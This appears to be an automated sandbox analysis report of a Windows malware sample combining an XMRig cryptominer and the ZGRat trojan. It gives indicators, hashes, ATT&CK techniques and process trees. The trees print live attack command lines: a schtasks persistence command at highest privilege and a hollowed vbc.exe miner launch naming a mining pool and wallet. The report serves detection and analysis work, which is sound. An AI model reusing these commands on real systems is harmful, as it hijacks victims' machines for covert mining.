xmrig | 0ec4dc59bfa704ff0777038d4c747fb42db308bed43f2ad6a681b645d1bfecbd

Analysis

max time kernel
1193s
max time network
1202s
platform
windows10-1703_x64
resource
win10-20231220-en
resource tags

arch:x64arch:x86image:win10-20231220-enlocale:en-usos:windows10-1703-x64system
submitted
26-01-2024 19:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6TS3GUANXW9E1KF8.exe
Size

5.6MB
MD5

1a27bd843a09f923661a15300e02d703
SHA1

5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6
SHA256

8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1
SHA512

330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05
SSDEEP

49152:q6orqtRW0jfH4+8MjRJHiEpxxH4vNpQXGp8mih7NUfXUu4tEqNrqcqapPeDkwVzO:foWjZG/Mul2rq/aReDkizMeQU4T

Score

10^/10

xmrig zgrat miner rat upx

Malware Config

Signatures

Detect ZGRat V1 4 IoCs

Processes:

resource	yara_rule
behavioral5/memory/2676-0-0x0000000000D40000-0x00000000012E0000-memory.dmp	family_zgrat_v1
behavioral5/files/0x000700000001ab8e-12.dat	family_zgrat_v1
behavioral5/files/0x000700000001ab8e-13.dat	family_zgrat_v1
behavioral5/files/0x000700000001ab8e-46.dat	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 41 IoCs

miner

Processes:

resource	yara_rule
behavioral5/memory/4856-25-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4856-27-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4856-28-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4856-29-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4856-30-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4856-31-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4856-34-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4856-35-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4856-37-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4856-39-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4856-38-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4856-40-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4856-43-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/3336-59-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/3336-60-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/3336-61-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/3336-62-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/3336-63-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/3336-67-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/3336-69-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/3336-70-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/3336-71-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/3336-72-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/1372-90-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/1372-92-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/1372-93-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/1372-94-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/1372-95-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/1372-98-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/1372-99-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4432-114-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4432-115-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4432-116-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4432-117-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4432-118-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4432-121-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/4432-122-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/3384-137-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/3384-138-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/3384-139-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral5/memory/3384-142-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

.NET Reactor proctector 4 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral5/memory/2676-0-0x0000000000D40000-0x00000000012E0000-memory.dmp	net_reactor
behavioral5/files/0x000700000001ab8e-12.dat	net_reactor
behavioral5/files/0x000700000001ab8e-13.dat	net_reactor
behavioral5/files/0x000700000001ab8e-46.dat	net_reactor

Executes dropped EXE 6 IoCs

Processes:

.exe.exe.exe.exe.exe.exe

pid	Process
2484	.exe
788	.exe
1376	.exe
2284	.exe
1584	.exe
1720	.exe

UPX packed file 48 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral5/memory/4856-19-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4856-21-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4856-23-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4856-25-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4856-27-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4856-28-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4856-29-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4856-30-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4856-31-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4856-34-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4856-35-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4856-37-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4856-39-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4856-38-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4856-40-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4856-43-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/3336-56-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/3336-59-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/3336-60-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/3336-61-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/3336-62-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/3336-63-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/3336-67-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/3336-69-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/3336-70-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/3336-71-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/3336-72-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/1372-87-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/1372-90-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/1372-92-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/1372-93-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/1372-94-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/1372-95-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/1372-98-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/1372-99-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4432-110-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4432-114-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4432-115-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4432-116-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4432-117-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4432-118-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4432-121-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/4432-122-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/3384-133-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/3384-137-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/3384-138-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/3384-139-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral5/memory/3384-142-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 5 IoCs

Processes:

.exe.exe.exe.exe.exe

description	pid	Process	procid_target
PID 2484 set thread context of 4856	2484	.exe	82
PID 788 set thread context of 3336	788	.exe	88
PID 1376 set thread context of 1372	1376	.exe	94
PID 2284 set thread context of 4432	2284	.exe	99
PID 1584 set thread context of 3384	1584	.exe	106

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
2416	schtasks.exe
4516	schtasks.exe
2220	schtasks.exe
4436	schtasks.exe
4388	schtasks.exe
3696	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

Processes:

timeout.exe

pid	Process
3764	timeout.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

.exe.exe.exe.exe.exe.exe

pid	Process
2484	.exe
788	.exe
1376	.exe
2284	.exe
1584	.exe
1720	.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

6TS3GUANXW9E1KF8.exe.exevbc.exe.exevbc.exe.exevbc.exe.exevbc.exe.exevbc.exe.exe

description	pid	Process
Token: SeDebugPrivilege	2676	6TS3GUANXW9E1KF8.exe
Token: SeDebugPrivilege	2484	.exe
Token: SeLockMemoryPrivilege	4856	vbc.exe
Token: SeLockMemoryPrivilege	4856	vbc.exe
Token: SeDebugPrivilege	788	.exe
Token: SeLockMemoryPrivilege	3336	vbc.exe
Token: SeLockMemoryPrivilege	3336	vbc.exe
Token: SeDebugPrivilege	1376	.exe
Token: SeLockMemoryPrivilege	1372	vbc.exe
Token: SeLockMemoryPrivilege	1372	vbc.exe
Token: SeDebugPrivilege	2284	.exe
Token: SeLockMemoryPrivilege	4432	vbc.exe
Token: SeLockMemoryPrivilege	4432	vbc.exe
Token: SeDebugPrivilege	1584	.exe
Token: SeLockMemoryPrivilege	3384	vbc.exe
Token: SeLockMemoryPrivilege	3384	vbc.exe
Token: SeDebugPrivilege	1720	.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

vbc.exevbc.exevbc.exevbc.exevbc.exe

pid	Process
4856	vbc.exe
3336	vbc.exe
1372	vbc.exe
4432	vbc.exe
3384	vbc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6TS3GUANXW9E1KF8.execmd.exe.execmd.exe.execmd.exe.execmd.exe.execmd.exe.execmd.exe.execmd.exe

description	pid	Process	procid_target
PID 2676 wrote to memory of 2504	2676	6TS3GUANXW9E1KF8.exe	75
PID 2676 wrote to memory of 2504	2676	6TS3GUANXW9E1KF8.exe	75
PID 2504 wrote to memory of 3764	2504	cmd.exe	76
PID 2504 wrote to memory of 3764	2504	cmd.exe	76
PID 2504 wrote to memory of 2484	2504	cmd.exe	77
PID 2504 wrote to memory of 2484	2504	cmd.exe	77
PID 2484 wrote to memory of 2968	2484	.exe	80
PID 2484 wrote to memory of 2968	2484	.exe	80
PID 2968 wrote to memory of 2416	2968	cmd.exe	79
PID 2968 wrote to memory of 2416	2968	cmd.exe	79
PID 2484 wrote to memory of 4856	2484	.exe	82
PID 2484 wrote to memory of 4856	2484	.exe	82
PID 2484 wrote to memory of 4856	2484	.exe	82
PID 2484 wrote to memory of 4856	2484	.exe	82
PID 2484 wrote to memory of 4856	2484	.exe	82
PID 2484 wrote to memory of 4856	2484	.exe	82
PID 2484 wrote to memory of 4856	2484	.exe	82
PID 788 wrote to memory of 4752	788	.exe	84
PID 788 wrote to memory of 4752	788	.exe	84
PID 4752 wrote to memory of 4516	4752	cmd.exe	87
PID 4752 wrote to memory of 4516	4752	cmd.exe	87
PID 788 wrote to memory of 3336	788	.exe	88
PID 788 wrote to memory of 3336	788	.exe	88
PID 788 wrote to memory of 3336	788	.exe	88
PID 788 wrote to memory of 3336	788	.exe	88
PID 788 wrote to memory of 3336	788	.exe	88
PID 788 wrote to memory of 3336	788	.exe	88
PID 788 wrote to memory of 3336	788	.exe	88
PID 1376 wrote to memory of 3972	1376	.exe	90
PID 1376 wrote to memory of 3972	1376	.exe	90
PID 3972 wrote to memory of 2220	3972	cmd.exe	93
PID 3972 wrote to memory of 2220	3972	cmd.exe	93
PID 1376 wrote to memory of 1372	1376	.exe	94
PID 1376 wrote to memory of 1372	1376	.exe	94
PID 1376 wrote to memory of 1372	1376	.exe	94
PID 1376 wrote to memory of 1372	1376	.exe	94
PID 1376 wrote to memory of 1372	1376	.exe	94
PID 1376 wrote to memory of 1372	1376	.exe	94
PID 1376 wrote to memory of 1372	1376	.exe	94
PID 2284 wrote to memory of 1004	2284	.exe	96
PID 2284 wrote to memory of 1004	2284	.exe	96
PID 2284 wrote to memory of 4432	2284	.exe	99
PID 2284 wrote to memory of 4432	2284	.exe	99
PID 2284 wrote to memory of 4432	2284	.exe	99
PID 2284 wrote to memory of 4432	2284	.exe	99
PID 2284 wrote to memory of 4432	2284	.exe	99
PID 2284 wrote to memory of 4432	2284	.exe	99
PID 2284 wrote to memory of 4432	2284	.exe	99
PID 1004 wrote to memory of 4436	1004	cmd.exe	100
PID 1004 wrote to memory of 4436	1004	cmd.exe	100
PID 1584 wrote to memory of 520	1584	.exe	102
PID 1584 wrote to memory of 520	1584	.exe	102
PID 520 wrote to memory of 4388	520	cmd.exe	105
PID 520 wrote to memory of 4388	520	cmd.exe	105
PID 1584 wrote to memory of 3384	1584	.exe	106
PID 1584 wrote to memory of 3384	1584	.exe	106
PID 1584 wrote to memory of 3384	1584	.exe	106
PID 1584 wrote to memory of 3384	1584	.exe	106
PID 1584 wrote to memory of 3384	1584	.exe	106
PID 1584 wrote to memory of 3384	1584	.exe	106
PID 1584 wrote to memory of 3384	1584	.exe	106
PID 1720 wrote to memory of 3100	1720	.exe	108
PID 1720 wrote to memory of 3100	1720	.exe	108
PID 3100 wrote to memory of 3696	3100	cmd.exe	111

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\6TS3GUANXW9E1KF8.exe
"C:\Users\Admin\AppData\Local\Temp\6TS3GUANXW9E1KF8.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp70CB.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2504
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:3764
- - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
    "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2484
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2968
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:4856

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
1⤵
- Creates scheduled task(s)
PID:2416

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:788
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4752
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4516
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3336

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1376
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3972
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:2220
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:1372

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2284
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1004
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4436
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4432

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1584
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:520
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4388
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3384

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1720
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3100
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
5.4MB

MD5
fa6dec4f0e9399bd0b604826a9081038

SHA1
e84b61a5472d7426ae247d6b72ca75b7bd4a5881

SHA256
96f661705f06c38cba9cf341074bb6a35fcc290bf1965afa059dff51cacacc50

SHA512
cd7389bccb8e1c4d1eb4d73e43685f41f94c6034532860f5d4d1915812dd32a67ba8f10af5db952c1f3931ba27fbc41a8fd52bf19bd7ca08a5fb24184831ada4

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
5.6MB

MD5
1a27bd843a09f923661a15300e02d703

SHA1
5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6

SHA256
8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1

SHA512
330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
2.5MB

MD5
8851400d75bd3586357d97cb3e64cbbe

SHA1
6630bed131a0767c2ec51690164874f14c46f8b1

SHA256
3ba7c613606c5804c5ec505fb4cbcb1235a16d9c5cb5b930ba70d6b0dfd3587d

SHA512
3ce99e39aa75b960e44d7b8378e4640d64c9bddc75ec226228e7a10dd81cfd188ea8adfb191e837d132c31fa70c545fffcc92e7fb6cc076859e8eb3d7ed20a9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\.exe.log

Filesize
1KB

MD5
99e47c178875de9fe1675fe5ba0e1f42

SHA1
c28934210fbe9d2ee90e751b8cf21be297b3d171

SHA256
773f7a03c7b56de09b71249ce4920458ef67fda14b923df1d5ebc1725101b9ff

SHA512
7a4b79273bbc4b5966680a48d63115feed3ae48dfc0ea2a7a11e202d06d9ecab2b4b1b8e2a3d1eb9e9b35169cf9ca866f785875e19e5eeadfe11b54500c05f4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp70CB.tmp.bat

Filesize
168B

MD5
843a2420817d0516bce7c2cbeaab79b7

SHA1
b1381c60efb0fa3c84438b85a275cb0766daa089

SHA256
797c502948694877df28760ffce96c85a779d97b2ef24df3c9af7220bd7f6336

SHA512
99c8cb534c0ff27fbd9d2547de31241fdb416fcdfb0bc1428852ebab6266f6dc3cf2e1c4376cd8f61c759bb603eccf01e4cb3985a734a6782b84435a39ac8c27

Download Submit
memory/788-52-0x0000000003330000-0x0000000003340000-memory.dmp

Filesize
64KB

Download
memory/788-48-0x00007FFEA5590000-0x00007FFEA5F7C000-memory.dmp

Filesize
9.9MB

Download
memory/788-64-0x00007FFEA5590000-0x00007FFEA5F7C000-memory.dmp

Filesize
9.9MB

Download
memory/788-50-0x0000000001540000-0x0000000001541000-memory.dmp

Filesize
4KB

Download
memory/788-49-0x0000000003330000-0x0000000003340000-memory.dmp

Filesize
64KB

Download
memory/788-51-0x00007FFEA5590000-0x00007FFEA5F7C000-memory.dmp

Filesize
9.9MB

Download
memory/1372-87-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1372-99-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1372-93-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1372-92-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1372-94-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1372-95-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1372-98-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1372-90-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1376-80-0x000000001CD80000-0x000000001CD90000-memory.dmp

Filesize
64KB

Download
memory/1376-81-0x0000000001CA0000-0x0000000001CA1000-memory.dmp

Filesize
4KB

Download
memory/1376-82-0x00007FFEA5590000-0x00007FFEA5F7C000-memory.dmp

Filesize
9.9MB

Download
memory/1376-83-0x000000001CD80000-0x000000001CD90000-memory.dmp

Filesize
64KB

Download
memory/1376-79-0x00007FFEA5590000-0x00007FFEA5F7C000-memory.dmp

Filesize
9.9MB

Download
memory/1376-91-0x00007FFEA5590000-0x00007FFEA5F7C000-memory.dmp

Filesize
